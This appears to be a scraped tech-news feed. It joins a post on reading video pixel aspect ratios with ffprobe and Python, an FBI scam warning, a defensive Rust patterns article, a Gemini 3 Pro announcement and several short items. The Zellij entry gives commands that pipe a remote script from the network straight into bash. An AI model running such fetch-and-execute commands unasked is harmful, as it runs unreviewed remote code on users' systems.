One video with a non-unit pixel aspect ratio is my download of Mars EDL 2020 Remastered . This video by Simeon Schmauß tries to match what the human eye would have seen during the landing of NASA’s Perseverance rover in 2021.

We can get the width, height, and sample aspect ratio (which is another name for pixel aspect ratio) using ffprobe:

$ ffprobe -v error \
      -select_streams v:0 \
      -show_entries stream=width,height,sample_aspect_ratio \
      "Mars 2020 EDL Remastered [HHhyznZ2u4E].mp4"
[STREAM]
width=1920
height=1080
sample_aspect_ratio=45:64
[/STREAM]

Here 1920 is the stored width, and 45:64 is the pixel aspect ratio. We can multiply them together to get the display width: 1920 × 45 / 64 = 1350 . This matches what I saw in QuickTime Player.

Let’s extract a single frame using ffmpeg , to get the stored pixels. This command saves the 5000th frame as a PNG image:

$ ffmpeg -i "Mars 2020 EDL Remastered [HHhyznZ2u4E].mp4" \
    -filter:v "select=eq(n\,5000)" \
    -frames:v 1 \
    frame.png

The image is 1920 × 1080 pixels, and it looks wrong: the circular parachute is visibly stretched.

Photo looking up towards a parachute against a dark brown sky. The parachute is made of white-and-orange segments, and is stretched horizontally. The circle is wider than it is tall.

Suppose we take that same image, but now apply the pixel aspect ratio. This is what the image is meant to look like, and it’s not a small difference – now the parachute actually looks like a circle.

The same photo as before, but now the parachute is a circle.

Seeing both versions side-by-side makes the problem obvious: the stored frame isn’t how the video is displayed. The video player in my browser will play it correctly using the pixel aspect ratio, but my layout code wasn’t doing that. I was telling the browser the wrong aspect ratio, and the browser had to update the page when it loaded the video file.

Getting the correct display dimensions in Python

This is my old function for getting the dimensions of a video file, which uses a Python wrapper around MediaInfo to extract the width and height fields. I now realise that this only gives me the storage aspect ratio, and may be misleading for some videos.

from pathlib import Path

from pymediainfo import MediaInfo


def get_storage_aspect_ratio(video_path: Path) -> tuple[int, int]:
    """
    Returns the storage aspect ratio of a video, as a width/height ratio.
    """
    media_info = MediaInfo.parse(video_path)
    
    try:
        video_track = next(
            tr
            for tr in media_info.tracks
            if tr.track_type == "Video"
        )
    except StopIteration:
        raise ValueError(f"No video track found in {video_path}")
    
    return video_track.width, video_track.height

I can’t find an easy way to extract the pixel aspect ratio using pymediainfo. It does expose a Track.aspect_ratio property, but that’s a string which has a rounded value – for example, 45:64 becomes 0.703 . That’s close, but the rounding introduces a small inaccuracy. Since I can get the complete value from ffprobe, that’s what I’m doing in my revised function.

The new function is longer, but it’s more accurate:

from fractions import Fraction
import json
from pathlib import Path
import subprocess


def get_display_aspect_ratio(video_path: Path) -> tuple[int, int]:
    """
    Returns the display aspect ratio of a video, as a width/height fraction.
    """
    cmd = [
        "ffprobe",
        #
        # verbosity level = error
        "-v", "error",
        #
        # only get information about the first video stream
        "-select_streams", "v:0",
        #
        # only gather the entries I'm interested in
        "-show_entries", "stream=width,height,sample_aspect_ratio",
        #
        # print output in JSON, which is easier to parse
        "-print_format", "json",
        #
        # input file
        str(video_path)
    ]
    
    output = subprocess.check_output(cmd)
    ffprobe_resp = json.loads(output)
    
    # The output will be structured something like:
    #
    #   {
    #       "streams": [
    #           {
    #               "width": 1920,
    #               "height": 1080,
    #               "sample_aspect_ratio": "45:64"
    #           }
    #       ],
    #       …
    #   }
    #
    # If the video doesn't specify a pixel aspect ratio, then it won't
    # have a `sample_aspect_ratio` key.
    video_stream = ffprobe_resp["streams"][0]
    
    try:
        pixel_aspect_ratio = Fraction(
            video_stream["sample_aspect_ratio"].replace(":", "/")
        )
    except KeyError:
        pixel_aspect_ratio = 1
    
    width = round(video_stream["width"] * pixel_aspect_ratio)
    height = video_stream["height"]
    
    return width, height

This is calling the ffprobe command I showed above, plus -print_format json to print the data in JSON, which is easier for Python to parse.

I have to account for the case where a video doesn’t set a sample aspect ratio – in that case, the displayed video just uses square pixels.

Since the aspect ratio is expressed as a ratio of two integers, this felt like a good chance to try the fractions module . That avoids converting the ratio to a floating-point number, which potentially introduces inaccuracies. It doesn’t make a big difference, but in my video collection treating the aspect ratio as a float produces results that are 1 or 2 pixels different from QuickTime Player.

When I multiply the stored width and aspect ratio, I’m using the round() function to round the final width to the nearest integer. That’s more accurate than int() , which always rounds down.

Conclusion: use display aspect ratio

When you want to know how much space a video will take up on a web page, look at the display aspect ratio, not the stored pixel dimensions. Pixels can be squashed or stretched before display, and the stored width/height won’t tell you that.

Videos with non-square pixels are pretty rare, which is why I ignored this for so long. I’m glad I finally understand what’s going on.

After switching to ffprobe and using the display aspect ratio, my pre-allocated video boxes now match what the browser eventually renders – no more letterboxing, no more layout jumps.

FBI warns of virtual kidnapping scams using altered social media photos

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 16:37:28
The FBI warns of criminals altering images shared on social media and using them as fake proof of life photos in virtual kidnapping ransom scams. [...]...
Original Article

FBI

The FBI warns of criminals altering images shared on social media and using them as fake proof of life photos in virtual kidnapping ransom scams.

This is part of a public service announcement published today about criminals contacting victims via text message, claiming to have kidnapped a family member and demanding ransom payments.

However, as the FBI explained, virtual kidnapping scams involve no actual abduction. Instead, criminals use manipulated images found on social networks and publicly available information to create convincing scenarios designed to pressure victims into paying ransoms before verifying that their loved ones are safe.

"Criminal actors typically will contact their victims through text message claiming they have kidnapped their loved one and demand a ransom be paid for their release," the FBI said on Friday.

"Oftentimes, the criminal actor will express significant claims of violence towards the loved one if the ransom is not paid immediately. The criminal actor will then send what appears to be a genuine photo or video of the victim's loved one, which upon close inspection often reveals inaccuracies when compared to confirmed photos of the loved one."

The law enforcement agency advised the public to be cautious of scammers who often create a false sense of urgency and to carefully assess the validity of the kidnappers' claims.

To defend against such scams, the FBI recommends taking several protective measures, such as avoiding providing personal information to strangers while traveling and establishing a code word known only to the family to verify communications during emergencies.

Additionally, when sharing information about missing persons online, one should remain vigilant, as scammers might reach out with false information.

The FBI also recommends taking screenshots or recording proof-of-life photos whenever possible for later analysis during investigations, since scammers sometimes deliberately send these photos using timed message features to limit the time victims have to analyze the images.

While the FBI didn't share how many complaints regarding these virtual kidnapping scams have been filed with its Internet Crime Complaint Center or how widespread this type of fraud is at the moment, BleepingComputer has found multiple instances of people targeted by similar scams that spoofed their loved ones' phone numbers .

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Patterns for Defensive Programming in Rust

Hacker News
corrode.dev
2025-12-05 16:34:25
Comments...
Original Article

I have a hobby.

Whenever I see the comment // this should never happen in code, I try to find out the exact conditions under which it could happen. And in 90% of cases, I find a way to do just that. More often than not, the developer just hasn’t considered all edge cases or future code changes.

In fact, the reason why I like this comment so much is that it often marks the exact spot where strong guarantees fall apart. Often, violating implicit invariants that aren’t enforced by the compiler are the root cause.

Yes, the compiler prevents memory safety issues, and the standard library is best-in-class. But even the standard library has its warts and bugs in business logic can still happen.

All we can work with are hard-learned patterns to write more defensive Rust code, learned throughout years of shipping Rust code to production. I’m not talking about design patterns here, but rather small idioms, which are rarely documented, but make a big difference in the overall code quality.

Code Smell: Indexing Into a Vector

Here’s some innocent-looking code:

if !matching_users.is_empty() {
    let existing_user = &matching_users[0];
    // ...
}

What if you refactor it and forget to keep the is_empty() check? The problem is that the vector indexing is decoupled from checking the length. So matching_users[0] can panic at runtime if the vector is empty.

Checking the length and indexing are two separate operations, which can be changed independently. That’s our first implicit invariant that’s not enforced by the compiler.

If we use slice pattern matching instead, we’ll only get access to the element if the correct match arm is executed.

match matching_users.as_slice() {
    [] => todo!("What to do if no users found!?"),
    [existing_user] => {   Safe! Compiler guarantees exactly one element
         No need to index into the vector,
         we can directly use `existing_user` here 
    }
    _ => Err(RepositoryError::DuplicateUsers)
}

Note how this automatically uncovered one more edge case: what if the list is empty? We hadn’t explicitly considered this case before. The compiler-enforced pattern matching requires us to think about all possible states! This is a common pattern in all robust Rust code: putting the compiler in charge of enforcing invariants.

Code Smell: Lazy use of Default

When initializing an object with many fields, it’s tempting to use ..Default::default() to fill in the rest. In practice, this is a common source of bugs. You might forget to explicitly set a new field later when you add it to the struct (thus using the default value instead, which might not be what you want), or you might not be aware of all the fields that are being set to default values.

Instead of this:

let foo = Foo {
    field1: value1,
    field2: value2,
    ..Default::default()  // Implicitly sets all other fields
};

Do this:

let foo = Foo {
    field1: value1,
    field2: value2,
    field3: value3, // Explicitly set all fields
    field4: value4,
    // ...
};

Yes, it’s slightly more verbose, but what you gain is that the compiler will force you to handle all fields explicitly. Now when you add a new field to Foo , the compiler will remind you to set it here as well and reflect on which value makes sense.

If you still prefer to use Default but don’t want to lose compiler checks, you can also destructure the default instance:

let Foo { field1, field2, field3, field4 } = Foo::default();

This way, you get all the default values assigned to local variables and you can still override what you need:

let foo = Foo {
    field1: value1,    // Override what you need
    field2: value2,    // Override what you need
    field3,            // Use default value
    field4,            // Use default value
};

This pattern gives you the best of both worlds:

  • You get default values without duplicating default logic
  • The compiler will complain when new fields are added to the struct
  • Your code automatically adapts when default values change
  • It’s clear which fields use defaults and which have custom values

Code Smell: Fragile Trait Implementations

Completely destructuring a struct into its components can also be a defensive strategy for API adherence. For example, let’s say you’re building a pizza ordering system and have an order type like this:

struct PizzaOrder {
    size: PizzaSize,
    toppings: Vec<Topping>,
    crust_type: CrustType,
    ordered_at: SystemTime,
}

For your order tracking system, you want to compare orders based on what’s actually on the pizza - the size , toppings , and crust_type . The ordered_at timestamp shouldn’t affect whether two orders are considered the same.

Here’s the problem with the obvious approach:

impl PartialEq for PizzaOrder {
    fn eq(&self, other: &Self) -> bool {
        self.size == other.size 
            && self.toppings == other.toppings 
            && self.crust_type == other.crust_type
                }
}

Now imagine your team adds a field for customization options:

struct PizzaOrder {
    size: PizzaSize,
    toppings: Vec<Topping>,
    crust_type: CrustType,
    ordered_at: SystemTime,
    extra_cheese: bool,  New field added
}

Your PartialEq implementation still compiles, but is it correct? Should extra_cheese be part of the equality check? Probably yes - a pizza with extra cheese is a different order! But you’ll never know because the compiler won’t remind you to think about it.

Here’s the defensive approach using destructuring:

impl PartialEq for PizzaOrder {
    fn eq(&self, other: &Self) -> bool {
        let Self {
            size,
            toppings,
            crust_type,
            ordered_at: _,
        } = self;
        let Self {
            size: other_size,
            toppings: other_toppings,
            crust_type: other_crust,
            ordered_at: _,
        } = other;

        size == other_size && toppings == other_toppings && crust_type == other_crust
    }
}

Now when someone adds the extra_cheese field, this code won’t compile anymore. The compiler forces you to decide: should extra_cheese be included in the comparison or explicitly ignored with extra_cheese: _ ?

This pattern works for any trait implementation where you need to handle struct fields: Hash , Debug , Clone , etc. It’s especially valuable in codebases where structs evolve frequently as requirements change.

Code Smell: From Impls That Are Really TryFrom

Sometimes there’s no conversion that will work 100% of the time. That’s fine. When that’s the case, resist the temptation to offer a From implementation out of habit; use TryFrom instead.

Here’s an example of TryFrom in disguise:

impl From<&DetectorStartupErrorReport> for DetectorStartupErrorSubject {
    fn from(report: &DetectorStartupErrorReport) -> Self {
        let postfix = report
            .get_identifier()
            .or_else(get_binary_name)
            .unwrap_or_else(|| UNKNOWN_DETECTOR_SUBJECT.to_string());

        Self(StreamSubject::from(
            format!("apps.errors.detectors.startup.{postfix}").as_str(),
        ))
    }
}

The unwrap_or_else is a hint that this conversion can fail in some way. We set a default value instead, but is it really the right thing to do for all callers? This should be a TryFrom implementation instead, making the fallible nature explicit. We fail fast instead of continuing with a potentially flawed business logic.

Code Smell: Non-Exhaustive Matches

It’s tempting to use match in combination with a catch-all pattern like _ => {} , but this can haunt you later. The problem is that you might forget to handle a new case that was added later.

Instead of:

match self {
    Self::Variant1 => {  ...  }
    Self::Variant2 => {  ...  }
    _ => {  catch-all  }
}

Use:

match self {
    Self::Variant1 => {  ...  }
    Self::Variant2 => {  ...  }
    Self::Variant3 => {  ...  }
    Self::Variant4 => {  ...  }
}

By spelling out all variants explicitly, the compiler will warn you when a new variant is added, forcing you to handle it. Another case of putting the compiler to work.

If the code for two variants is the same, you can group them:

match self {
    Self::Variant1 => {  ...  }
    Self::Variant2 => {  ...  }
    Self::Variant3 | Self::Variant4 => {  shared logic  }
}

Code Smell: _ Placeholders for Unused Variables

Using _ as a placeholder for unused variables can lead to confusion. For example, you might get confused about which variable was skipped. That’s especially true for boolean flags:

match self {
    Self::Rocket { _, _, .. } => {  ...  }
}

In the above example, it’s not clear which variables were skipped and why. Better to use descriptive names for the variables that are not used:

match self {
    Self::Rocket { has_fuel: _, has_crew: _, .. } => {  ...  }
}

Even if you don’t use the variables, it’s clear what they represent and the code becomes more readable and easier to review without inline type hints.

Pattern: Temporary Mutability

If you only want your data to be mutable temporarily, make that explicit.

let mut data = get_vec();
data.sort();
let data = data;  // Shadow to make immutable

// Here `data` is immutable.

This pattern is often called “temporary mutability” and helps prevent accidental modifications after initialization. See the Rust unofficial patterns book for more details.

You can go one step further and do the initialization part in a scope block:

let data = {
    let mut data = get_vec();
    data.sort();
    data  // Return the final value
};
// Here `data` is immutable

This way, the mutable variable is confined to the inner scope, making it clear that it’s only used for initialization. In case you use any temporary variables during initialization, they won’t leak into the outer scope. In our case above, there were none, but imagine if we had a temporary vector to hold intermediate results:

let data = {
    let mut data = get_vec();
    let temp = compute_something();
    data.extend(temp);
    data.sort();
    data  // Return the final value
};

Here, temp is only accessible within the inner scope, which prevents it from accidental use later on.

This is especially useful when you have multiple temporary variables during initialization that you don’t want accessible in the rest of the function. The scope makes it crystal clear that these variables are only meant for initialization.

Pattern: Defensively Handle Constructors

The following pattern is only truly helpful for libraries and APIs that need to be robust against future changes. In such a case, you want to ensure that all instances of a type are created through a constructor function that enforces validation logic. Because without that, future refactorings can easily lead to invalid states.

For application code, it’s probably best to keep things simple. You typically have all the call sites under control and can ensure that validation logic is always called.

Let’s say you have a simple type like the following:

pub struct S {
    pub field1: String,
    pub field2: u32,
}

Now you want to add validation logic to ensure invalid states are never created. One pattern is to return a Result from the constructor:

impl S {
    pub fn new(field1: String, field2: u32) -> Result<Self, String> {
        if field1.is_empty() {
            return Err("field1 cannot be empty".to_string());
        }
        if field2 == 0 {
            return Err("field2 cannot be zero".to_string());
        }
        Ok(Self { field1, field2 })
    }
}

But nothing stops someone from bypassing your validation by creating an instance directly:

let s = S {
    field1: "".to_string(),
    field2: 0,
};

This should not be possible! It is our implicit invariant that’s not enforced by the compiler: the validation logic is decoupled from struct construction. These are two separate operations, which can be changed independently and the compiler won’t complain.

To force external code to go through your constructor, add a private field:

pub struct S {
    pub field1: String,
    pub field2: u32,
    _private: (),  This prevents external construction 
}

impl S {
    pub fn new(field1: String, field2: u32) -> Result<Self, String> {
        if field1.is_empty() {
            return Err("field1 cannot be empty".to_string());
        }
        if field2 == 0 {
            return Err("field2 cannot be zero".to_string());
        }
        Ok(Self { field1, field2, _private: () })
    }
}

Now code outside your module cannot construct S directly because it cannot access the _private field. The compiler enforces that all construction must go through your new() method, which includes your validation logic!

Note that the underscore prefix is just a naming convention to indicate the field is intentionally unused; it’s the lack of pub that makes it private and prevents external construction.

For libraries that need to evolve over time, you can also use the #[non_exhaustive] attribute instead:

#[non_exhaustive]
pub struct S {
    pub field1: String,
    pub field2: u32,
}

This has the same effect of preventing construction outside your crate, but also signals to users that you might add more fields in the future. The compiler will prevent them from using struct literal syntax, forcing them to use your constructor.

There’s a big difference between these two approaches:

  • #[non_exhaustive] only works across crate boundaries. It prevents construction outside your crate.
  • _private works at the module boundary. It prevents construction outside the module , but within the same crate.

On top of that, some developers find _private: () more explicit about intent: “this struct has a private field that prevents construction.”

With #[non_exhaustive] , the primary intent is signaling that fields might be added in the future, and preventing construction is more of a side effect.

But what about code within the same module ? With the patterns above, code in the same module can still bypass your validation:

// Still compiles in the same module!
let s = S {
    field1: "".to_string(),
    field2: 0,
    _private: (),
};

Rust’s privacy works at the module level, not the type level. Anything in the same module can access private items.

If you need to enforce constructor usage even within your own module, you need a more defensive approach using nested private modules:

mod inner {
    pub struct S {
        pub field1: String,
        pub field2: u32,
        _seal: Seal,
    }
    
     This type is private to the inner module
    struct Seal;
    
    impl S {
        pub fn new(field1: String, field2: u32) -> Result<Self, String> {
            if field1.is_empty() {
                return Err("field1 cannot be empty".to_string());
            }
            if field2 == 0 {
                return Err("field2 cannot be zero".to_string());
            }
            Ok(Self { field1, field2, _seal: Seal })
        }
    }
}

// Re-export for public use
pub use inner::S;

Now even code in your outer module cannot construct S directly because Seal is trapped in the private inner module. Only the new() method, which lives in the same module as Seal , can construct it. The compiler guarantees that all construction, even internal construction, goes through your validation logic.

You could still access the public fields directly, though.

let s = S::new("valid".to_string(), 42).unwrap();
s.field1 = "".to_string(); // Still possible to mutate fields directly

To prevent that, you can make the fields private and provide getter methods instead:

mod inner {
    pub struct S {
        field1: String,
        field2: u32,
        _seal: Seal,
    }
    
    struct Seal;
    
    impl S {
        pub fn new(field1: String, field2: u32) -> Result<Self, String> {
            if field1.is_empty() {
                return Err("field1 cannot be empty".to_string());
            }
            if field2 == 0 {
                return Err("field2 cannot be zero".to_string());
            }
            Ok(Self { field1, field2, _seal: Seal })
        }

        pub fn field1(&self) -> &str {
            &self.field1
        }

        pub fn field2(&self) -> u32 {
            self.field2
        }
    }
}

Now the only way to create an instance of S is through the new() method, and the only way to access its fields is through the getter methods.

When to Use Each

To enforce validation through constructors:

  • For external code : Add a private field like _private: () or use #[non_exhaustive]
  • For internal code : Use nested private modules with a private “seal” type
  • Choose based on your needs : Most code only needs to prevent external construction; forcing internal construction is more defensive but also more complex

The key insight is that by making construction impossible without access to a private type, you turn your validation logic from a convention into a guarantee enforced by the compiler. So let’s put that compiler to work!

Pattern: Use #[must_use] on Important Types

The #[must_use] attribute is often neglected. That’s sad, because it’s such a simple yet powerful mechanism to prevent callers from accidentally ignoring important return values.

#[must_use = "Configuration must be applied to take effect"]
pub struct Config {
     ...
}

impl Config {
    pub fn new() -> Self {
            }

    pub fn with_timeout(mut self, timeout: Duration) -> Self {
        self.timeout = timeout;
        self
    }
}

Now if someone creates a Config but forgets to use it, the compiler will warn them (even with a custom message!):

let config = Config::new();
// Warning: Configuration must be applied to take effect
config.with_timeout(Duration::from_secs(30)); 

// Correct usage:
let config = Config::new()
    .with_timeout(Duration::from_secs(30));
apply_config(config);

This is especially useful for guard types that need to be held for their lifetime and results from operations that must be checked. The standard library uses this extensively. For example, Result is marked with #[must_use] , which is why you get warnings if you don’t handle errors.

Code Smell: Boolean Parameters

Boolean parameters make code hard to read at the call site and are error-prone. We all know the scenario where we’re sure this will be the last boolean parameter we’ll ever add to a function.

// Too many boolean parameters
fn process_data(data: &[u8], compress: bool, encrypt: bool, validate: bool) {
     ...
}

// At the call site, what do these booleans mean?
process_data(&data, true, false, true);  // What does this do?

It’s impossible to understand what this code does without looking at the function signature. Even worse, it’s easy to accidentally swap the boolean values.

Instead, use enums to make the intent explicit:

enum Compression {
    Strong,
    Medium,
    None,
}

enum Encryption {
    AES,
    ChaCha20,
    None,
}

enum Validation {
    Enabled,
    Disabled,
}

fn process_data(
    data: &[u8],
    compression: Compression,
    encryption: Encryption,
    validation: Validation,
) {
     ...
}

// Now the call site is self-documenting
process_data(
    &data,
    Compression::Strong,
    Encryption::None,
    Validation::Enabled
);

This is much more readable and the compiler will catch mistakes if you pass the wrong enum type. You will notice that the enum variants can be more descriptive than just true or false . And more often than not, there are more than two meaningful options; especially for programs which grow over time.

For functions with many options, you can configure them using a parameter struct:

struct ProcessDataParams {
    compression: Compression,
    encryption: Encryption,
    validation: Validation,
}

impl ProcessDataParams {
     Common configurations as constructor methods
    pub fn production() -> Self {
        Self {
            compression: Compression::Strong,
            encryption: Encryption::AES,
            validation: Validation::Enabled,
        }
    }

    pub fn development() -> Self {
        Self {
            compression: Compression::None,
            encryption: Encryption::None,
            validation: Validation::Enabled,
        }
    }
}

fn process_data(data: &[u8], params: ProcessDataParams) {
     ...
}

// Usage with preset configurations
process_data(&data, ProcessDataParams::production());

// Or customize for specific needs
process_data(&data, ProcessDataParams {
    compression: Compression::Medium,
    encryption: Encryption::ChaCha20,
    validation: Validation::Enabled, 
});

This approach scales much better as your function evolves. Adding new parameters doesn’t break existing call sites, and you can easily add defaults or make certain fields optional. The preset methods also document common use cases and make it easy to use the right configuration for different scenarios.

Rust is often criticized for not having named parameters, but using a parameter struct is arguably even better for larger functions with many options.

Clippy Lints for Defensive Programming

Many of these patterns can be enforced automatically using Clippy lints. Here are the most relevant ones:

Lint Description
clippy::indexing_slicing Prevents direct indexing into slices and vectors
clippy::fallible_impl_from Warns about From implementations that can panic and should be TryFrom instead.
clippy::wildcard_enum_match_arm Disallows wildcard _ patterns.
clippy::unneeded_field_pattern Identifies when you’re ignoring too many struct fields with .. unnecessarily.
clippy::fn_params_excessive_bools Warns when a function has too many boolean parameters (4 or more by default).
clippy::must_use_candidate Suggests adding #[must_use] to types that are good candidates for it.

You can enable these in your project by adding them at the top of your crate, e.g.

#![deny(clippy::indexing_slicing)]
#![deny(clippy::fallible_impl_from)]
#![deny(clippy::wildcard_enum_match_arm)]
#![deny(clippy::unneeded_field_pattern)]
#![deny(clippy::fn_params_excessive_bools)]
#![deny(clippy::must_use_candidate)]

Or in your Cargo.toml :

[lints.clippy]
indexing_slicing = "deny"
fallible_impl_from = "deny"
wildcard_enum_match_arm = "deny"
unneeded_field_pattern = "deny"
fn_params_excessive_bools = "deny"
must_use_candidate = "deny"

Conclusion

Defensive programming in Rust is about leveraging the type system and compiler to catch bugs before they happen. By following these patterns, you can:

  • Make implicit invariants explicit and compiler-checked
  • Future-proof your code against refactoring mistakes
  • Reduce the surface area for bugs

It’s a skill that doesn’t come naturally and it’s not covered in most Rust books, but knowing these patterns can make the difference between code that works but is brittle, and code that is robust and maintainable for years to come.

Remember: if you find yourself writing // this should never happen , take a step back and ask how the compiler could enforce that invariant for you instead. The best bug is the one that never compiles in the first place.

Zellij: A terminal workspace with batteries included

Hacker News
zellij.dev
2025-12-05 16:18:58
Comments...
Original Article

Portrait

A terminal workspace with batteries included

Try Zellij Without Installing

For bash/zsh: bash <(curl -L https://zellij.dev/launch)
For fish: bash (curl -L https://zellij.dev/launch | psub)

View the script that will be executed here

Discord Chat Matrix Chat

Zellij stickers

Would you like some Zellij stickers?

Gemini 3 Pro: the frontier of vision AI

Hacker News
blog.google
2025-12-05 16:15:10
Comments...
Original Article

Gemini 3 Pro delivers state-of-the-art performance across document, spatial, screen and video understanding.

General summary

Gemini 3 Pro is Google's most capable multimodal model that delivers state-of-the-art performance across document, spatial, screen and video understanding. You can use it for complex visual reasoning, document processing, and understanding spatial relationships. Check out the developer documentation or play with the model in Google AI Studio to get started.

Summaries were generated by Google AI. Generative AI is experimental.

Image with black background and Gemini 3 Pro logo

Your browser does not support the audio element.

Listen to article

This content is generated by Google AI. Generative AI is experimental

[[duration]] minutes

Gemini 3 Pro represents a generational leap from simple recognition to true visual and spatial reasoning. It is our most capable multimodal model ever, delivering state-of-the-art performance across document, spatial, screen and video understanding.

This model sets new highs on vision benchmarks such as MMMU Pro and Video MMMU for complex visual reasoning, as well as use-case-specific benchmarks across document, spatial, screen and long video understanding.

Vision AI benchmarks table

1. Document understanding

Real-world documents are messy, unstructured, and difficult to parse — often filled with interleaved images, illegible handwritten text, nested tables, complex mathematical notation and non-linear layouts. Gemini 3 Pro represents a major leap forward in this domain, excelling across the entire document processing pipeline — from highly accurate Optical Character Recognition (OCR) to complex visual reasoning.

Intelligent perception

To truly understand a document, a model must accurately detect and recognize text, tables, math formulas, figures and charts regardless of noise or format.

A fundamental capability is "derendering" — the ability to reverse-engineer a visual document back into structured code (HTML, LaTeX, Markdown) that would recreate it. As illustrated below, Gemini 3 demonstrates accurate perception across diverse modalities including converting an 18th-century merchant log into a complex table, or transforming a raw image with mathematical annotation into precise LaTeX code.

Example 1: Handwritten Complex Table from 18th century Albany Merchant’s Handbook ( HTML transcription )

Example 2: Reconstructing equations from an image

Example 3: Reconstructing Florence Nightingale's original Polar Area Diagram into an interactive chart (with a toggle!)

Sophisticated reasoning

Users can rely on Gemini 3 to perform complex, multi-step reasoning across tables and charts — even in long reports. In fact, the model notably outperforms the human baseline on the CharXiv Reasoning benchmark (80.5%).

To illustrate this, imagine a user analyzing the 62-page U.S. Census Bureau " Income in the United States: 2022 " report with the following prompt: “Compare the 2021–2022 percent change in the Gini index for "Money Income" versus "Post-Tax Income", and what caused the divergence in the post-tax measure, and in terms of "Money Income", does it show the lowest quintile's share rising or falling?”

Swipe through the images below to see the model's step-by-step reasoning.

Visual Extraction: To answer the Gini Index Comparison question, Gemini located and cross-referenced this info in Figure 3 about “Money Income decreased by 1.2 percent” and in Table B-3 about “Post-Tax Income increased by 3.2 percent”

Causal Logic: Crucially, Gemini 3 does not stop at the numbers; it correlates this gap with the text’s policy analysis, correctly identifying Lapse of ARPA Policies and the end of Stimulus Payments are the main causes.

Numerical Comparison: To compare the lowest quantile’s share rising or falling, Gemini3 looked at table A-3, and compared the number of 2.9 and 3.0, and concluded that “the share of aggregate household income held by the lowest quintile was rising.”

2. Spatial understanding

Gemini 3 Pro is our strongest spatial understanding model so far. Combined with its strong reasoning, this enables the model to make sense of the physical world.

  • Pointing capability: Gemini 3 has the ability to point at specific locations in images by outputting pixel-precise coordinates. Sequences of 2D points can be strung together to perform complex tasks, such as estimating human poses or reflecting trajectories over time.
  • Open vocabulary references: Gemini 3 identifies objects and their intent using an open vocabulary. The most direct application is robotics: the user can ask a robot to generate spatially grounded plans like, “Given this messy table, come up with a plan on how to sort the trash.” This also extends to AR/XR devices, where the user can request an AI assistant to “Point to the screw according to the user manual.”

3. Screen understanding

Gemini 3.0 Pro’s spatial understanding really shines through its screen understanding of desktop and mobile OS screens. This reliability helps make computer use agents robust enough to automate repetitive tasks. UI understanding capabilities can also enable tasks like QA testing, user onboarding and UX analytics. The following computer use demo shows the model perceiving and clicking with high precision.

4. Video understanding

Gemini 3 Pro takes a massive leap forward in how AI understands video, the most complex data format we interact with. It is dense, dynamic, multimodal and rich with context.

  1. High frame rate understanding: We have optimized the model to be much stronger at understanding fast-paced actions when sampling at >1 frames-per-second. Gemini 3 Pro can capture rapid details — vital for tasks like analyzing golf swing mechanics.

By processing video at 10 FPS—10x the default speed—Gemini 3 Pro catches every swing and shift in weight, unlocking deep insights into player mechanics.

2. Video reasoning with “thinking” mode: We upgraded "thinking" mode to go beyond object recognition toward true video reasoning. The model can now better trace complex cause-and-effect relationships over time. Instead of just identifying what is happening, it understands why it is happening.

3. Turning long videos into action: Gemini 3 Pro bridges the gap between video and code. It can extract knowledge from long-form content and immediately translate it into functioning apps or structured code.

5. Real-world applications

Here are a few ways we think various fields will benefit from Gemini 3’s capabilities.

Education

Gemini 3.0 Pro’s enhanced vision capabilities drive significant gains in the education field, particularly for diagram-heavy questions central to math and science. It successfully tackles the full spectrum of multimodal reasoning problems found from middle school through post-secondary curriculums. This includes visual reasoning puzzles (like Math Kangaroo ) and complex chemistry and physics diagrams.

Gemini 3’s visual intelligence also powers the generative capabilities of Nano Banana Pro . By combining advanced reasoning with precise generation, the model, for example, can help users identify exactly where they went wrong in a homework problem.

Prompt: “Here is a photo of my homework attempt. Please check my steps and tell me where I went wrong. Instead of explaining in text, show me visually on my image.” (Note: Student work is shown in blue; model corrections are shown in red). [ See prompt in Google AI Studio ]

Image showing input of a handwritten equation on the left and the model's correction annotated on top of the handwritten equation

Medical and biomedical imaging

Gemini 3 Pro 1 stands as our most capable general model for medical and biomedical imagery understanding, achieving state-of-the-art performance across major public benchmarks in MedXpertQA-MM (a difficult expert-level medical reasoning exam), VQA-RAD (radiology imagery Q&A) and MicroVQA (multimodal reasoning benchmarks for microscopy based biological research).

Input image from MicroVQA - a benchmark for microscopy-based biological research

Image showing a stained kidney cortex image on the left and the model prompt and response on the right

Law and finance

Gemini 3 Pro’s enhanced document understanding helps professionals in finance and law tackle highly complex workflows. Finance platforms can seamlessly analyze dense reports filled with charts and tables, while legal platforms benefit from the model's sophisticated document reasoning.

6. Media resolution control

Gemini 3 Pro improves the way it processes visual inputs by preserving the native aspect ratio of images. This drives significant quality improvements across the board.

Additionally, developers gain granular control over performance and cost via the new media_resolution parameter. This allows you to tune visual token usage to balance fidelity against consumption:

  • High resolution: Maximizes fidelity for tasks requiring fine detail, such as dense OCR or complex document understanding.
  • Low resolution: Optimizes for cost and latency on simpler tasks, such as general scene recognition or long-context tasks.

For specific recommendations, refer to our Gemini 3.0 Documentation Guide .

Build with Gemini 3 Pro

We are excited to see what you build with these new capabilities. To get started, check out our developer documentation or play with the model in Google AI Studio today.

I'm Peter Roberts, immigration attorney who does work for YC and startups. AMA

Hacker News
news.ycombinator.com
2025-12-05 16:04:20
Comments...
Original Article

Hi Peter, thanks for doing the AMA! I have a Delaware registered LLC (10 years old), I managed to get even an EIN remotely. However, I can't open a bank account remotely and so I have just been paying the registered agent fees and Delaware gov taxes for the LLC all these years. I however, genuinely want to come to the states to open the bank account and actually expand my business into the US. The LLC hasn't really had any meetings/etc. but taxes are paid. How do I use my LLC to apply for a B1/B2 to visit the US?

OR should I just close it and try the normal route? Thanks in advance!

Framework Laptop 13 gets ARM processor with 12 cores via upgrade kit

Hacker News
www.notebookcheck.net
2025-12-05 15:49:56
Comments...
Original Article
The Framework Laptop 13 can now be equipped with an ARM processor (Image source: Notebookcheck)
The Framework Laptop 13 can now be equipped with an ARM processor (Image source: Notebookcheck)

The Framework Laptop 13 has a replaceable mainboard, which means that the processor can be easily upgraded after purchase. While Framework itself only offers Intel and AMD CPUs, a mainboard with a high-performance ARM processor from a third-party manufacturer has now launched.

The Qualcomm Snapdragon X Plus and Snapdragon X Elite have proven that ARM processors have earned a place in the laptop market, as devices like the Lenovo IdeaPad Slim 5 stand out with their long battery life and an affordable price point.

